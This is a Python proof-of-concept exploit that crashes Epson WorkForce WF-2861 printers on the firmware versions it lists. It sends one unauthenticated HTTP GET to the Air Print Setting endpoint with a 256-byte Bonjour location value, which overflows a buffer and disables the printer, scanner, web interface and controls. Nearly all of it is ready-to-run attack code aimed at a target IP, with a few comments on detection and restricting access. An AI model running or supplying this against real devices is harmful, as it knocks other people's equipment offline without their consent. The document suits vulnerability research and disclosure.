#############################################################################
# Proof of Concept - Epson printer DoS via buffer overflow in 'Air Print Setting' #
# email : epist.fortunatos@gmail.com #
# #
# tested specifications #
# firmware version : 10.48 LQ22I3(Recovery-mode), #
# 10.51.LQ20I6, #
# 10.52.LQ17IA(Latest) #
# printer model : WorkForce WF-2861 #
# effect : printer, scanner, web, touch-panel, button #
#############################################################################
import sys
import requests
# HTTP request sent by the `Air Print Setting` page of the EPSON printer web
# interface (reference only; the string literal below is not used by the script)
'''
GET /PRESENTATION/BONJOUR?INPUTT_BSNAME=aaaa&INPUTT_BLOCATION=aaaa&INPUTT_GEOLOCATION=0.000000%2C0.000000&SEL_PPROTOCOL=IPP&trigger=AirPrint_trg_confset HTTP/1.1
Host: 192.168.0.25
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.0.25/PRESENTATION/BONJOUR?INPUTT_BSNAME=aaaa&INPUTT_BLOCATION=aaaa&INPUTT_GEOLOCATION=0.000000%2C0.000000&SEL_PPROTOCOL=IPP&trigger=AirPrint_trg_set&tm=
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
'''
# Address of the printer's embedded web server, read from the first
# command-line argument (no argument check is made).
target_ip = sys.argv[1]

# Form values for the Bonjour / AirPrint settings request shown above.
# Only the Bonjour location value is relevant to the crash; the others just
# need to be present.
bonjour_name = 'AAAA'
# Per the author's notes, the service-location buffer overflows when this
# field is longer than about 251 bytes; 256 bytes is used here.
bonjour_location = 'A' * 256
geolocation = '0,0'
print_protocol = 'IPP'

# Query string in the same field order as the captured request. Values are
# joined as-is, with no URL encoding.
query_fields = [
    'INPUTT_BSNAME=' + bonjour_name,
    'INPUTT_BLOCATION=' + bonjour_location,
    'INPUTT_GEOLOCATION=' + geolocation,
    'SEL_PPROTOCOL=' + print_protocol,
    'trigger=AirPrint_trg_confset',
]
url = 'http://' + target_ip + '/PRESENTATION/BONJOUR?' + '&'.join(query_fields)

print '[*]payload : %s' % url

# A single plain-HTTP GET applies the setting. No credentials or session
# cookie are sent and no timeout is set, so the call blocks until the device
# answers or the connection fails.
# NOTE(review): whether the endpoint accepts this without authentication
# depends on the device configuration - confirm; restricting the web
# configuration interface to trusted management hosts limits exposure.
# Detection: a request to /PRESENTATION/BONJOUR whose INPUTT_BLOCATION value
# exceeds the length noted above stands out in proxy or network logs.
requests.get(url=url)